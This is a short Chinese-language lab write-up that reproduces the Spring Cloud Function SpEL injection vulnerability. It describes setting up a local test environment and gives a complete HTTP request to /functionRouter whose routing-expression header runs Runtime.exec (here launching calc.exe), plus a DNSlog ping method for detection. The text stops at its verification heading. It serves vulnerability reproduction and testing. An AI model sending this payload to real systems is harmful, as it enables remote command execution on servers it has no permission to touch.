Spring-Cloud-Function-Spel 漏洞復現

1、漏洞環境搭建

　　由於漏洞出現在前兩天，原本等待vulhub出環境，直接docker 一鍵就ok了。但是這次vulhub好像不太及時。對於自己只能自己搭建環境了。

       找了許久，終於在唐大佬的github中找到幾乎一鍵的方法。

　　參考鏈接：https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel  這里放原始鏈接以表示尊重。

　　無法上github的話，私信我。

　　搭建方法很簡單，先安裝maven  jdk 等。大佬是jdk17  我本地下載最新版本18 也是ok

　　

 

     方法如下：下載代碼后，在解壓目錄cmd執行 mvn spring-boot:run  會下載很多庫，需要耐心等待。成功后會開啟8080 端口。

　 

 

 

   漏洞poc極其簡單：

　　路徑最好使用funtionRouter，原因自查。此環境倒是任意路徑都ok。

　　

POST /functionRouter HTTP/1.1
Host: 192.168.1.7:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc.exe")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
  可以執行任意命令，檢測的話可以使用dnslog方法。直接ping  dnslog平台。

 

　　漏洞驗證：